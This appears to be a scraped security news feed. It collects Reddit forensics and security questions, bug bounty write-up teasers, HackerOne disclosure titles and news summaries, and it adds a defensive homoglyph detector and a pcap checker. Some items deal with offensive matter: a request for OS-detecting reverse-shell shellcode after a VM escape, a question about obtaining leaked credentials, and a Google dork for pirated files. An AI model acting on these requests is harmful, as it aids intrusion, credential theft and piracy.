    Doing a forensics study for a project and I have an Amcache.hve file I would like to look at to see the installation history of the computer. I have tried using applications such as Eric Zimmerman's AppCompatCacheParser. However, every time I try to run the program it uses my personal Amcache file, not the one I am trying to look at. This could be because I am using the path wrong within the command. Regardless of this, my overall question is: is there any free software such as Autopsy or others where I can look at an Amcache.hve file? submitted by /u/Friendly-Intention-2 [link] [comments]
    How to identify uninstalled apps under iOS?
    I'm analyzing an image of an iPhone. In the knowledgeC.db I found some artifacts that a certain app has been installed on the device. I didn't find the app in the dump and now I'm wondering if the app might have been uninstalled. However, I don't know if there are artifacts that show up when an app is uninstalled, can you help me out on this one? I found the app name in the file /private/var/mobile/Library/Preferences/com.apple.mt.killed.plist. Does this file list uninstalled apps? submitted by /u/F-2016 [link] [comments]
    Let's Talk About MUICache
    Good morning, Happy Thanksgiving week! 📷 Here’s a new 13Cubed episode about MUICache – a Windows forensic artifact that doesn't get a lot of attention. Enjoy! ----- In this episode, we'll take an in-depth look at Windows MUICache. We'll start by reviewing the purpose of this Windows feature, the metadata it collects, and its forensic value in showing evidence of program execution. Then, we'll jump into a demo and see it in action. Episode: https://www.youtube.com/watch?v=ea2nvxN878s Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    Tools for seccomp analysis
    submitted by /u/boutnaru [link] [comments]
    Fuzzing the web for mysterious bugs
    A really nice blog post from the security researcher 0xacb about REcollapse technique. submitted by /u/hisxo [link] [comments]
    Email Graffiti: Vandalize old emails. It's like an NFT but better. Tool linked in blog
    submitted by /u/wifihack [link] [comments]
    A Confused Deputy Vulnerability in AWS AppSync | Datadog Security Labs
    submitted by /u/RedTermSession [link] [comments]
  • Open

    CVE-2022-41924 – tailscaled can be used to remotely execute code on Windows
    Article URL: https://emily.id.au/tailscale Comments URL: https://news.ycombinator.com/item?id=33695886 Points: 527 # Comments: 99
    CVE-2022-41924 - RCE in Tailscale, DNS Rebinding, and You
    Article URL: https://emily.id.au/tailscale Comments URL: https://news.ycombinator.com/item?id=33695842 Points: 5 # Comments: 0
    Why CVE-2022-3602 was not detected by fuzz testing
    Article URL: http://allsoftwaresucks.blogspot.com/2022/11/why-cve-2022-3602-was-not-detected-by.html Comments URL: https://news.ycombinator.com/item?id=33693873 Points: 186 # Comments: 135
  • Open

    Main app methodology : Bug bounties
    What is a bug bounty? Continue reading on System Weakness »
    Main app methodology : Bug bounties
    What is a bug bounty? Continue reading on Medium »
    Fastly Subdomain Takeover $2000
    WHOAMI My name is Alexandar Thangavel AKA ValluvarSploit, a full-time bug hunter and trainer. I love recon. I am the founder and CEO of… Continue reading on InfoSec Write-ups »
    Fastly Subdomain Takeover $2000
    WHOAMI My name is Alexandar Thangavel AKA ValluvarSploit, a full-time bug hunter and trainer. I love recon. I am the founder and CEO of… Continue reading on Medium »
    Pass the Hash Attack
    We hear about breaches on a daily basis, and sometimes even about system compromises, so what stages does the attacker take and how does… Continue reading on InfoSec Write-ups »
    P1 Bug Hunting: A Step by Step Guide to SQL Injection
    TL;DR- A beginners guide to SQL Injection in bug hunting, and obtaining access to the inner databases of targets. Continue reading on The Gray Area »
    Email Verification Bypass
    Introduction: Continue reading on Medium »
    Defining scopes for bug bounty programs
    Setting the programme scope is the first stage in developing your programme brief, which you should do if you’ve decided that you and your… Continue reading on Medium »
    Root detection analysis and bypass — Rootbeer Library |Beginner | Part 1
    For those who don’t know, I am Ashish (co-founder of Bluefire redteam), We engage with many real-world cybersecurity challenges, and this… Continue reading on Medium »
  • Open

    Anyone familiar with text encryption? Or I’m not exactly sure if that’s the correct term.
    Is anyone familiar with encrypting text? Like character encoding, I think it is. Take this message for example ( Yоuг sign in OTP is 822960. Wе will NEVER cаll for this. ) If you have Siri (text yourself) or a computer read this message aloud, it will be read differently than it appears. How is this done? I think it may have something to do with Unicode, but I’m not sure. submitted by /u/blightedfailure [link] [comments]
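    What the post describes is script mixing, not encryption: the letters that the screen reader pronounces differently are Cyrillic code points that render like their Latin look-alikes, which is exactly how phishing SMS and lookalike domains slip past keyword filters. The following is an added example (not code from the post) that uses Python's unicodedata to flag every letter outside the expected script and to list words that mix scripts; SAMPLE_MESSAGE is constructed with escape sequences to reproduce the post's message, and the script name is read from the first word of the Unicode character name, a cheap heuristic rather than a full Unicode script property lookup.

```python
import re
import unicodedata
from typing import List, Optional

# Constructed to mirror the message quoted in the post: four Latin-looking letters are Cyrillic.
SAMPLE_MESSAGE = "Y\u043eu\u0433 sign in OTP is 822960. W\u0435 will NEVER c\u0430ll for this."


def script_of(ch: str) -> Optional[str]:
    """First word of the Unicode name as a script label ('LATIN', 'CYRILLIC', 'GREEK', ...).
    Digits, punctuation and spaces return None so they never count as a script switch.
    Heuristic: compatibility forms report their own prefix (e.g. 'FULLWIDTH'), which is
    also worth flagging in a message that claims to be plain Latin text."""
    if not ch.isalpha():
        return None
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def detect_homoglyphs(text: str, expected: str = "LATIN") -> List[dict]:
    """Every letter whose script is not the one the message is supposed to be written in."""
    hits = []
    for pos, ch in enumerate(text):
        script = script_of(ch)
        if script is not None and script != expected:
            hits.append({"pos": pos, "char": ch, "codepoint": f"U+{ord(ch):04X}",
                         "name": unicodedata.name(ch, "?")})
    return hits


def mixed_script_words(text: str) -> List[str]:
    """Words that mix two or more scripts. This needs no assumption about the expected
    script; it is the same idea browsers apply to internationalized domain labels."""
    out = []
    for word in re.findall(r"\S+", text):
        scripts = {script_of(c) for c in word} - {None}
        if len(scripts) > 1:
            out.append(word.strip(".,;:!?()"))
    return out


def normalize_does_not_help(text: str) -> bool:
    """NFKC folds compatibility forms (fullwidth, ligatures) but leaves Cyrillic letters alone,
    so normalization cannot 'clean' this message. Returns True when hits survive NFKC."""
    return bool(detect_homoglyphs(unicodedata.normalize("NFKC", text)))


if __name__ == "__main__":
    for hit in detect_homoglyphs(SAMPLE_MESSAGE):
        print(f"pos {hit['pos']:2d}  {hit['codepoint']}  {hit['name']}")
    print("mixed-script words:", mixed_script_words(SAMPLE_MESSAGE))
```

    The practical consequence for a filter is that a normalization step is not a defence here; the check has to be on scripts per word, and anything that mixes scripts in what should be an English OTP message deserves to be quarantined.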
    Suricata errors
    Hi all, I've been trying to resolve a few issues with Suricata and can't seem to get it working; any help would be much appreciated.
    sudo suricata -c /etc/suricata/suricata.yaml -r /home/links/fuzz-2020-11-05-11628.pcap
    21/11/2022 -- 14:27:28 - - This is Suricata version 6.0.8 RELEASE running in USER mode
    21/11/2022 -- 14:27:44 - - [ERRCODE: SC_ERR_PCAP_OPEN_OFFLINE(26)] - failed to get first packet timestamp. pcap_next_ex(): -2
    21/11/2022 -- 14:27:44 - - [ERRCODE: SC_ERR_PCAP_DISPATCH(20)] - Failed to init pcap file /home/links/fuzz-2020-11-05-11628.pcap, skipping
    21/11/2022 -- 14:27:44 - - Ring buffer initialized with 0 files.
    21/11/2022 -- 14:27:44 - - all 3 packet processing threads, 4 management threads initialized, engine started.
    21/11/2022 -- 14:27:44 - - [ERRCODE: SC_ERR_INVALID_ARGUMENT(13)] - pcap file reader thread failed to initialize
    21/11/2022 -- 14:27:44 - - Signal Received. Stopping engine.
    submitted by /u/jugonaught [link] [comments]
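    The -2 from pcap_next_ex() is libpcap's end-of-file return, so the reader opened the file (the global header parsed) but found no packet record to take the first timestamp from: the capture is empty after its header, or its first record is cut off. The following added example (not code from the post, from Suricata or from libpcap) parses a classic pcap in pure Python, counts whole records and reports truncation, which is the check to run on a capture before handing it to Suricata; build_pcap constructs sample captures from made-up packet bytes so the checker can be exercised offline.

```python
import struct

# libpcap magic numbers as read little-endian; the byte-swapped values mean the file is big-endian.
PCAP_MAGIC = {
    0xA1B2C3D4: ("<", "microsecond"), 0xA1B23C4D: ("<", "nanosecond"),
    0xD4C3B2A1: (">", "microsecond"), 0x4D3CB2A1: (">", "nanosecond"),
}
PCAPNG_MAGIC = 0x0A0D0D0A  # pcapng Section Header Block type; libpcap reads that format too


def inspect_pcap(data: bytes) -> dict:
    """Walk a classic pcap in memory and report what a reader like Suricata will see."""
    info = {"format": None, "byte_order": None, "packets": 0, "truncated": False, "error": None}
    if len(data) < 4:
        info["error"] = "shorter than a magic number"
        return info
    magic = struct.unpack("<I", data[:4])[0]
    if magic == PCAPNG_MAGIC:
        info["format"] = "pcapng"  # block-based; not walked by this classic-pcap checker
        return info
    if magic not in PCAP_MAGIC:
        info["error"] = f"unknown magic 0x{magic:08x} (not a capture file)"
        return info
    order, unit = PCAP_MAGIC[magic]
    info["format"] = f"pcap ({unit} timestamps)"
    info["byte_order"] = "little" if order == "<" else "big"
    if len(data) < 24:
        info["truncated"] = True
        info["error"] = "global header incomplete"
        return info
    # version_major, version_minor, thiszone, sigfigs, snaplen, linktype
    major, minor, _tz, _sigfigs, snaplen, linktype = struct.unpack(order + "HHiIII", data[4:24])
    info.update(version=f"{major}.{minor}", snaplen=snaplen, linktype=linktype)
    off = 24
    while off < len(data):
        if off + 16 > len(data):
            info["truncated"] = True  # record header cut off
            break
        _sec, _frac, incl_len, _orig_len = struct.unpack(order + "IIII", data[off:off + 16])
        if incl_len > snaplen or off + 16 + incl_len > len(data):
            info["truncated"] = True  # bogus length or payload cut off
            break
        info["packets"] += 1
        off += 16 + incl_len
    if info["packets"] == 0 and not info["truncated"]:
        info["error"] = "valid header but zero packet records; readers hit EOF on the first read"
    return info


def inspect_pcap_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return inspect_pcap(fh.read())


def build_pcap(packets, order="<", snaplen=65535, linktype=1) -> bytes:
    """Constructed classic pcap (Ethernet link type by default) used to exercise the checker."""
    out = struct.pack(order + "I", 0xA1B2C3D4) + struct.pack(order + "HHiIII", 2, 4, 0, 0, snaplen, linktype)
    for i, pkt in enumerate(packets):
        out += struct.pack(order + "IIII", 1_600_000_000 + i, 0, len(pkt), len(pkt)) + pkt
    return out


# Made-up frame bytes; only their lengths matter to the record walk.
SAMPLE_PACKETS = [b"\x00" * 14 + b"\x45" + b"\x00" * 19, b"\xff" * 60]

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, inspect_pcap_file(path))
    if len(sys.argv) == 1:
        print("constructed empty capture:", inspect_pcap(build_pcap([])))
```

    capinfos from the Wireshark suite reports the same facts for real files; a checker like this is useful when a fuzzing pipeline (which the filename suggests) emits thousands of captures and the empty or truncated ones should be dropped before Suricata is pointed at them.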
    How to change the SSH port in the new Ubuntu version? (Tried many times, not working)
    Using a VPS with the latest Ubuntu and new to the Linux command line. It's for hosting a website. Tried via sudo nano /etc/ssh/sshd_config, but it does not seem to work. Tried ports like 2864, 31457, but nope :( The default port just does NOT change. Video: https://youtu.be/STtg62zx73k In the video, though, you can see I may have used 65564, which is not valid, but this was like the 51st attempt. I know it should be less than 65535. The default 22 just won't change. Also, when I went to change the port number, it said port and listenaddress are not used when sshd is socket activated. screenshot: https://imgur.com/b2t1ASm This Ubuntu thread shows the commands: server - SSH default port not changing (Ubuntu 22.10) - Ask Ubuntu, but I am new to Linux and not familiar with the commands. I inputted those commands, but it did not work. Can anyone help with the proper command? submitted by /u/yoyobono [link] [comments]
    How would a security pro do an ad-hoc reality check on a domain?
    An email from "my phone carrier" (let's call the company `MPC`) came from an unexpected domain, something like "mpc-mail . com" - Used Windows nslookup but the results look like queries are being filtered to the point where only the domain is returned. Test queries to other domains were more forthcoming of course. Using web searches the parent company info eventually surfaced and I concluded it's a legitimate domain associated with the parent company. Nonetheless what's a better resource than just poking around? I tried the IANA whois form but the info returned was for a different objective. submitted by /u/Daddy-ough [link] [comments]
    Hi, I was learning some OSINT and a question struck me
    We use tools like intelx and dehashed to get leaked credentials. How are these tools able to get those leaked credentials? Is there any Google dorking going on behind the scenes, or anything else? And is there any way to get those leaked credentials without using these sites? And are there any Google dorks for this? submitted by /u/geeky_gopher [link] [comments]
  • Open

    Write-up: Basic server-side template injection @ PortSwigger Academy
    No content preview
    Pass the Hash Attack
    We hear about breaches on a daily basis, and sometimes even about system compromises, so what stages does the attacker take and how does… Continue reading on InfoSec Write-ups »
    TryHackMe writeup: AttackerKB
    This article discusses the AttackerKB project and a greater phenomenon that it is based on: the wisdom of the crowds. Continue reading on InfoSec Write-ups »
    [ Malware Analysis #5] — Eternity Project — Eternity Worm
    No content preview
    IW Weekly #34: Attacking SAML 2.0,
    No content preview
  • Open

    SecWiki News 2022-11-21 Review
    Using North Korean hackers as an example: how to use VirusTotal to pivot on samples by Avenger; The road to automated code auditing with CodeQL (part 2) by ourren; SecWiki Weekly (issue 455) by ourren; For more of the latest articles, visit SecWiki
  • Open

    FreeBuf Morning Report | India releases draft Personal Data Protection Bill 2022; Trump returns to Twitter after Musk's poll
    [Global Developments] 1. The Indian government released the draft Personal Data Protection Bill 2022. The draft aims to ensure the security of personal data by stating the purpose of collecting information and classifying it precisely, with the user's consent. The draft is open for public comment until December 17, 2022. [Foreign press - read original] 2. The quiet evolution of digital authoritarianism in Vietnam. With the support of Western tech giants, a new surveillance system has emerged in Vietnam, and digital rights are in decline. [Read original] 3. Trump returns to Twitter after Musk's poll. Musk
    Indian government releases draft Personal Data Protection Bill 2022
    The Personal Data Protection Bill 2022 aims to ensure the security of personal data by stating the purpose of collecting information and classifying it precisely, with the user's consent.
    Notice of postponement of the CIS 2022 Cybersecurity Conference (Beijing venue)
    The "CIS 2022 Cybersecurity Innovation Conference Beijing venue", originally scheduled for November 30, 2022, will be postponed; the new date will be announced as soon as it is confirmed.
  • Open

    Threat Assessment: Luna Moth Callback Phishing Campaign
    Unit 42 investigates the Luna Moth/Silent Ransom Group callback phishing extortion campaign that targeted businesses in multiple sectors. The post Threat Assessment: Luna Moth Callback Phishing Campaign appeared first on Unit 42.
  • Open

    How To Social Engineer The Metaverse
    A lot of hacking is playing with other people, you know, getting them to do strange things. Continue reading on Medium »
  • Open

    Open redirect that can lead to malicious websites
    AMBER AI disclosed a bug submitted by mrdot404: https://hackerone.com/reports/1771749
    Dependency Confusion via Lookup Request Forwarding to PyPi.org
    GitLab disclosed a bug submitted by usd-responsible-disclosure: https://hackerone.com/reports/1681275
  • Open

    Analysis of a SQL injection vulnerability in the WordPress plugin WooCommerce
    Author: Moyun Technology VLab Team. Original link: https://mp.weixin.qq.com/s/mlLVIVM4bpQbOV8dVXaJSA Vulnerability summary: WooCommerce is an open-source e-commerce plugin based on WordPress. It has since become the most popular e-commerce system in the world, designed for small and large online merchants using WordPress. The plugin was released on September 27, 2011, and with its easy installation and customization and its free base product...
    WatchDog continues to target East Asian CSP companies
    Author: cadosecurity. Translator: Knownsec 404 Lab translation team. Original link: https://www.cadosecurity.com/watchdog-continues-to-target-east-asian-csps/ Introduction: Researchers at Cado Labs recently discovered that the WatchDog hacking group has resurfaced. WatchDog is an opportunistic and well-known hacking group that frequently targets resources hosted by various cloud service providers in order to...
  • Open

    Jodorowsky - Moebius
    https://rphv.net/books/Jodorowsky-graphic-novels/ Use this search: +(.MOBI|.CBZ|.CBR|.CBC|.CHM|.EPUB|.FB2|.LIT|.LRF|.ODT|.PDF|.PRC|.PDB|.PML|.RB|.RTF|.TCR) moebius intitle:"index of" -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) -inurl:(hypem|unknownsecret|sirens|writeups|trimediacentral|articlescentral|listen77|mp3raid|mp3toss|mp3drug|theindexof|index_of|wallywashis|indexofmp3) submitted by /u/Shitemoji69 [link] [comments]

  • Open

    The Best Bug Bounty Hunting Tips and Tricks of 2022
    TL;DR- These are the best resources that I’ve found, and different methods of learning that I’ve used on my bug hunting journey. Continue reading on The Gray Area »
    India’s Centric Bug Bounty Platform with Integrated Bug Bounty Tools
    One year earlier, Cyber3ra announced to build of India’s First Bug Bounty platform. After a year-long wait, Cyber3ra finally unveiled the… Continue reading on Medium »
    Deep Dive into Hidden Web
    How to perform Pentest Recon using Gobuster. Continue reading on InfoSec Write-ups »
    GAS theft attack in Solv Protocol
    Bug Description Continue reading on Medium »
  • Open

    System misconfiguration is the number one vulnerability, at least for Mastodon
    submitted by /u/0xdea [link] [comments]
  • Open

    TEAMs in CYBERSECURITY
    Let’s examine the simple military map presented in Figure 1. Let me explain it to those who don’t know how to read a military map. It is an… Continue reading on Medium »
  • Open

    Help me spot the buffer overflow in the code below
    Hi, I was learning about buffer overflows and just thought: can a buffer overflow occur in the Python code below, and if yes, then how? size = int(input("Enter size of stack: ")) print("Size of stack is: ", size) stk = [] print("Start entering values in stack") for x in range(size): val = int(input()) stk.append(val) print(stk) submitted by /u/geeky_gopher [link] [comments]
  • Open

    Write-up: Reflected XSS into HTML context with nothing encoded @ PortSwigger Academy
    No content preview
    How I earned $47000 USD as a high school student
    No content preview
    HTB Omni [writeup]
    Exploiting Windows IoT Core using SireRAT Continue reading on InfoSec Write-ups »
    Russian roulette XSS
    No content preview
    Deep Dive into Hidden Web
    No content preview
  • Open

    SecWiki News 2022-11-20 Review
    Bug bounty hunter series: steps and tips for testing e-commerce related functionality, part I by 蓝色淡风; For more of the latest articles, visit SecWiki
  • Open

    FreeBuf Morning Report | Nearly half of macOS malware comes from a single application; phishing attacks against Middle Eastern countries doubled ahead of the World Cup
    Ahead of the Qatar World Cup, email-based phishing attacks targeting the Middle East doubled in October.
    Reverse_SSH: an SSH-based reverse shell tool
    Reverse_SSH is an SSH-based reverse shell tool; with its help, researchers can use SSH to obtain a reverse shell.
  • Open

    Thoughts on Teaching Digital Forensics
    When I first started writing books, my "recipe" for how to present the information followed the same structure I saw in other books at the time. While I was writing books to provide content along the lines of what I wanted to see, essentially filling in the gaps I saw in books on DFIR for Windows systems, I was following the same formula other books had used to that point. At the time, it made sense to do this, in order to spur adoption. Later, when I sat down to write Investigating Windows Systems, I made a concerted effort to take a different approach. What I did this time was present a walk-through of various investigations using images available for download on the Internet (over time, some of them were no longer available). I started with the goals (where all investigations must start…
  • Open

    SPY NEWS: 2022 — Week 46
    Summary of the espionage-related news stories for the Week 46 (November 13–19) of 2022. Continue reading on Medium »
    GitFive OSINT tool
    Track down GitHub users Continue reading on Medium »
  • Open

    Am I exposed to some kind of a vulnerability if the file downloads for a very long time?
    Case 1: downloading a file at high speeds, and it downloads within minutes. Great. Case 2: downloading a file at very low speeds, and it takes a whole day to download it, which isn't necessarily bad because I can do other stuff during that time. But in case 2, am I exposing myself to some kind of vulnerability because the connection is "open" for so long? submitted by /u/rockelephant [link] [comments]
  • Open

    No rate limiting for Remove Account lead to huge Mass mailings
    Weblate disclosed a bug submitted by tanvir_0x: https://hackerone.com/reports/1723445
  • Open

    Reverse TCP shellcode that detects the operating system and creates a shell based on that? (Linux and Windows)
    Let's assume you have an RCE, something like a VMware escape. Now that you have escaped and can execute shellcode on the host machine, you need to detect the operating system using your assembly shellcode, and then do a jump based on the operating system and get the reverse TCP based on whether it's Windows or Linux. Has anyone already written something like this somewhere like GitHub or..? I especially need to study the part where they are detecting whether it's Windows or Linux only by using assembly, and I obviously need that to be a generic way of detecting both of them, and don't want it to only work on certain Linux distributions, for example. Anyone here seen something like this before? submitted by /u/BitDrill [link] [comments]
    Vehicle OSINT Collection
    Hey all, I am currently working on a scraping tool that gathers information related to a specific vehicle, and have put together a collection of tools/websites/repositories that assist both my project and individuals performing OSINT investigations. I am looking to expand this collection, and would appreciate any feedback/additions to this collection regarding vehicle data, such as image, license plate, and vin databases/search tools. All feedback is welcome, and please feel free to utilize this collection as you desire. https://github.com/TheBurnsy/Vehicle-OSINT-Collection submitted by /u/Seth-Rogens-Balls [link] [comments]
  • Open

    How hard is it to get into the field?
    Hello, everyone. I'm almost done with a computer science degree, and one of the career fields I've been looking into is computer forensics. I was wondering if I could ask a couple of questions about the field. How hard is it to get your first job? Assuming I have a CS bachelor's and a forensics certification or two--but zero IT work experience. Are good social skills super important? I know that you have to testify in court and explain your findings to people, but I was wondering if it would still be a good career field for someone socially awkward or someone bad at interacting in general. At the moment, I'm kind of torn between web dev and going into this field, but if I'm honest, everything about computer forensics is more interesting to me even if it is slightly harder to break into. I also like coding in Python and automating stuff, which would be a plus. Thank you in advance for any help/advice. submitted by /u/8585858585858 [link] [comments]
    Discovery Attender Boolean Search Expressions
    Hi everyone, I'm trying to do a Boolean search expression on Discovery Attender on a bunch of files. These are the words that I got to search: pension /10 lost or gone Aquila or CALPX or California Power Exchange Corporation Walmart burn* Colorado River Commission fire* or smoke Coral and Power and LLC *.doc* and *.xls* and f*.jp* This is the Boolean search expression that I got so far: (pension NEAR(10) {lost OR gone}) OR (Aquila OR CALPX OR "California Power Exchange Corporation") OR Walmart OR burn* OR ("Colorado River Commission") OR (fire* OR smoke) OR (Coral AND Power AND LLC) OR Discovery Attender accepts all the search expression so far, but I'm having trouble with the last line as I don't know how to modify the wildcard expressions. *.doc* and *.xls* and f*.jp* Any help will be appreciated. Thank you. submitted by /u/-Melquiades- [link] [comments]
    Xbox Series S Forensic Examination
    Hey all, I just finished a personal project of mine doing an examination into the Series S. I pulled the SSD out and imaged it and brought it into X-Ways. Obviously much of the files were encrypted and/or compressed but I was wondering if there had been any movement on deciphering the .xvd (and variants) file format. There are obviously files of interest that you can see during the examination like GameDVR.xvd that would provide some neat information. I know of the xvdtool developed by emoose on GitHub but was wondering if there's anything anyone heard at the water cooler. Yeah I know you can clone or obtain a search warrant for cloud data at Microsoft but I'm still interested in these files. Especially because the former doesn't provide insight into anything that might have been deleted and/or altered. submitted by /u/YallGottaStopFr [link] [comments]

  • Open

    Career in digital forensics
    Hi all - I think I have secured a digital forensics job with a LEA and was wondering the pros and cons of working in this employment field? How have people found career progression and the potential to learn new skills/upskilling? What’s the operational tempo like? Learning transferable skills that can be used as a DF examiner within LEA…but also take those skills to other government agencies? Banking? Private sector? I know there isn’t a blanket answer, but just wanting some insight from those who have been there and done that. Thanks all submitted by /u/OkGrape5530 [link] [comments]
    How common is something like this? Is it computer forensics job to determine whether malware is the culprit or not?
    submitted by /u/Jorteg31 [link] [comments]
  • Open

    Why does v2ray need a *valid* certificate?
    Is it solely for active probing plausibility? Wonder why I need to trust the chain for personal encrypted connections. submitted by /u/nobodysu [link] [comments]
    question for vulnerability scanner operators
    What are the most common vulnerabilities you deal with day to day and how are they remediated? submitted by /u/Putrid-Security9059 [link] [comments]
    Going Back For My Master's Degree
    Been a long-time lurker but haven't posted. Currently a 35M who finished his Bachelor's Degree [Bachelor of Information Technology] 2 years ago and wants to go back for a Master's Degree in Cybersecurity. Currently working as an IT Analyst with a few cybersecurity [mostly governance] projects under my belt, but I figure a degree is going to get me an actual job with the title. There's a lot of information out there, but it's hard to find a good list of schools that have what I am looking for, if it even exists at all. I am looking for the following: - Accredited program - Online/can be mixed, but I am in the Metro Detroit area - Geared towards a mix of management and technical skills - I don't care if the GMAT is required or if any testing is required - If possible, under 20k for the entire program [work pays up to 10k a year] Do any of you know of a program out there which fulfills the requirements above? Thanks in advance for any/all help! EDIT: should also note that I've been at this IT Analyst job for over 10 years but have about 2 years of cybersecurity/governance projects under my belt. I hope this helps. submitted by /u/FootCallus [link] [comments]
    How does VPN hide its encryption key from WiFi HotSpot at startup?
    (Google only shows irrelevant results.) All results say that it does hide everything from the WiFi admin, but BEFORE that, how can this protect the encryption key from being discovered while connecting to the VPN? Because how can you tell a VPN what encryption key will be used without having to send it unencrypted first? Kind regards :) submitted by /u/StackTraceException [link] [comments]
    Best online Masters in Cybersecurity?
    I enjoyed WGU's BS CSIA degree, but their master's seems too easy (people post getting it done in a couple of months), and I want to use the GI Bill towards a bigger name. Originally I was looking into SANS because all I have are CompTIA, ISC2, and EC-Council certs, and I notice lots of jobs look for GIAC. However, it is nearly the price of UC Berkeley and top-notch schools whose names carry a lot of weight (many don't know the name SANS outside of our sphere). SANS sounds cool but almost like a really expensive way to study all of their certs. UC Berkeley requires mandatory 4:30pm-6:30pm daily attendance Mon-Fri, which does not work for me working full time in the field. I find it strange in today's world that an online school would demand a Mon-Fri daily live class. Any recommendations for a flexible online master's? I can do weekly, monthly, even daily deadlines, but I can't commit to a live class Mon-Fri. Please comment your favorite or recommendation!! submitted by /u/Jleslie0329 [link] [comments]
  • Open

    Bug Zero at a Glance [Week 12–18 November]
    Let’s look back at #GEW2022 w/ Bug Zero Continue reading on Bug Zero »
    Russian roulette XSS
    Story Continue reading on InfoSec Write-ups »
    Stealing data using PING
    In Red Teaming exercise once we are inside the internal network of our target, we try to avoid our presence from the network security… Continue reading on System Weakness »
    My Top 7 Favorite Websites to (Legally) Improve My Web-Hacking Skills
    TL;DR- The best places to improve your bug-hunting skills without getting your door kicked down by the cops. Continue reading on The Gray Area »
    My bug bounty journey
    Hi readers, my name is Tarun. This is actually my first write up, the reason behind this write up is that, I always wanted to pursue a… Continue reading on Medium »
  • Open

    SecWiki News 2022-11-19 Review
    US situational awareness: the CHARIOT IoT encryption project by ourren; Summary of fuzzing papers from the four top information security conferences of 2022 by ourren; For more of the latest articles, visit SecWiki
  • Open

    Reflected XSS in chatbot
    MTN Group disclosed a bug submitted by roland_hack: https://hackerone.com/reports/1735622
  • Open

    4 Videos to Help You At The Start of Your Infosec/Hacking Career
    No content preview
  • Open

    fastjson deserialization vulnerability analysis, part 1
    A walk through the fastjson vulnerabilities across historical versions
  • Open

    Let’s become Invincible and learn Defense Evasion :-
    Hey all, back again with another awesome writeup and thanks all of you for reading and loving my writeups. I hope you all are learning… Continue reading on Medium »
  • Open

    Use FFuF with BurpSuite
    For other FFuF use cases, please refer to: Use FFuF to Perform Directory Brute-Forcing — by Lejing Huang Use FFuF to Perform API Fuzzing —… Continue reading on Medium »
    Use FFuF to Perform API Fuzzing
    For other use cases of FFuF, you can refer to: Use FFuF to perform Directory Brute-forcing — by Lejing Huang Use FFuF with BurpSuite — by… Continue reading on Medium »
  • Open

    An AI Based Solution to Detecting the DoubleZero .NET Wiper
    Unit 42 presents a machine learning model to predict maliciousness of .NET samples based on file structures, by analyzing the DoubleZero .NET wiper. The post An AI Based Solution to Detecting the DoubleZero .NET Wiper appeared first on Unit 42.

  • Open

    Can USB Wall Adapters Store and Transfer Data?
    Question in the title. Just wondering since I'm worried about being hacked using one submitted by /u/No_Trash_9832 [link] [comments]
    Are network switches safe without needing to run any diagnostics or anything?
    I bought a network switch from a local place. My friend told me it’s simple, I run one Ethernet cable from my router to the switch, and then run two or three short Ethernet cables from the switch to my PS5, Apple TV, Xbox, etc — and they will all be on Ethernet with zero meaningful delay or loss of quality. Am I overthinking it? Aren’t I plugging a third party device directly into my network and it can see all traffic? In theory couldn’t this contain malware? submitted by /u/will-succ-4-guac [link] [comments]
    CVE Vulnerability Tracking
    Does anyone have any go-to RSS feeds that update daily with CVEs? Tried using the opencve RSS feed, but that just doesn't seem to either work or pick up many CVEs rated 7 and above. Tried NVD, but there's no way to differentiate between low-scoring CVEs and high-scoring ones (wanting to focus more on the high-scoring CVEs). Cheers! submitted by /u/cryptobfoo [link] [comments]
  • Open

    Remediation Archeology — Finding and Decoding an Ancient XSS
    One of my favorite pastimes in Bug Bounty is reviewing my ancient (read: 2 or 3 years old) vulnerability reports. I feel like I’ve come a… Continue reading on Medium »
    How I found CVE-2022–40088
    Hey Squad, Continue reading on Medium »
    How I found 8 vulnerabilities in 24h
    Hello Awesome Hackers, I hope you are all doing well! My name is Mohamed Anani, or 0xM5awy. Continue reading on Medium »
    How to Hide Your Website’s Front-End For Increased Security
    TL;DR- If you’re creating any website to showcase to others, you’ll want to make your site as secure as possible, while staying optimized. Continue reading on The Gray Area »
    $250 for Email account enumeration using “NameToMail” tool
    Hi amazing hackers. Continue reading on Medium »
    Explaining vulnerabilities : Cross Site Scripting (XSS)
    Cross-Site Scripting (or XSS) is one of the most common bugs reported to bug bounty programs. It’s so prevalent that, every single year… Continue reading on Medium »
    Dorking: The hidden filters….
    People use normal search queries, but hackers use special filters for searching unique and hidden items on both the surface and the dark web… Continue reading on Medium »
    The Best Ways to Exploit Rate Limit Vulnerabilities
    TL;DR- If you’re into bug bounties or just white-hat hacking in general, you’ve probably heard of no-rate-limit vulnerabilities Continue reading on The Gray Area »
  • Open

    OSINT Tip #2 — Rewards Programs
    Rewards programs can be leveraged in order to associate a name with a phone number. Anytime you’re asked to provide a phone number when… Continue reading on Medium »
    Lost at Sea — Hacktoria Contract Walkthrough (Understanding OSINT)
    In this article we are going to solve a new contract from Hacktoria called as “Lost at Sea”. Continue reading on Medium »
    Early warning system social media: video stream documents animal abuse and domestic violence live
    Live on the video streaming platform Twitch, an allegedly juvenile streamer abuses his mother, is himself abused, and assaults… Continue reading on Medium »
  • Open

    New recon tool!
    Just released csprecon - Reconnaissance tool based on Content Security Policy https://github.com/edoardottt/csprecon #github #security #infosec #bugbounty submitted by /u/edoardottt [link] [comments]
  • Open

    Open Redirect at
    U.S. Dept Of Defense disclosed a bug submitted by angeltsvetkov: https://hackerone.com/reports/1634105
    IDOR on [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by nightm4re: https://hackerone.com/reports/1627974
    Reflected XSS | https://
    U.S. Dept Of Defense disclosed a bug submitted by x3ph_: https://hackerone.com/reports/1736432
    Reflected XSS | https://
    U.S. Dept Of Defense disclosed a bug submitted by x3ph_: https://hackerone.com/reports/1736433
    Log4j Vulnerability [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by fklet: https://hackerone.com/reports/1624137 - Bounty: $1000
    Default password on 34.120.209.175
    Elastic disclosed a bug submitted by newspaper: https://hackerone.com/reports/1415241 - Bounty: $245
    Directory Listing at https://...
    8x8 disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1771051
  • Open

    Forensic Image to Review Tool
